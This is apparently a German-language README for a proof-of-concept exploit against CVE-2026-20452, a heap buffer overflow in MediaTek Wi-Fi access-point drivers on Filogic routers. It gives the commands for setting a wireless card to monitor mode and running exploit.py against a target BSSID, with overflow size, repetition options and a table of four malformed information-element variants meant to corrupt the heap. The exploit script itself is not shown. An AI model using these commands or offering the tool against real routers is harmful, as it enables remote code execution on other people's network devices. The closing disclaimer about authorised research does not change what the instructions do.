
Proof-of-Concept-Exploit für CVE-2026-20452, einen heap-basierten Pufferüberlauf in MediaTek WLAN AP-Treibern. Verwendet scapy, um maßgeschneiderte Wi-Fi-Management-Frames zu senden, um eine entfernte Codeausführung auf betroffenen Filogic-Routern auszulösen.
Proof-of-Concept-Exploit für CVE-2026-20452, einen heap-basierten Pufferüberlauf im WLAN Access Point-Treiber von MediaTek.
https://www.hunt-benito.com/blog/mediatek-wlan-heap-overflow-cve-2026-20452-filogic-router-rce/
pip install scapy)sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Interface becomes wlan0mon
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66 \
--overflow-size 1024 --variant 2 --count 50 --delay 0.05
Dieses Tool wird ausschließlich für autorisierte Sicherheitsforschung und zu Bildungszwecken bereitgestellt. Das Senden auf WLAN-Frequenzen kann in Ihrem Zuständigkeitsbereich eine rechtliche Genehmigung erfordern. Die unbefugte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal. Die Autoren übernehmen keine Haftung und sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
| Variante | IE-Typ | Beschreibung |
|---|
| 0 | Vendor Specific (221) | Einzelne überdimensionierte IE mit OUI 00:50:43 |
| 1 | Verkettete Vendor-IEs | Mehrere kleine IEs, um benachbarte Heap-Objekte zu beschädigen |
| 2 | HT Capabilities (45) | Überdimensionierte HT Capabilities-IE |
| 3 | Extended Capabilities (127) | Überdimensionierte Extended Capabilities-IE |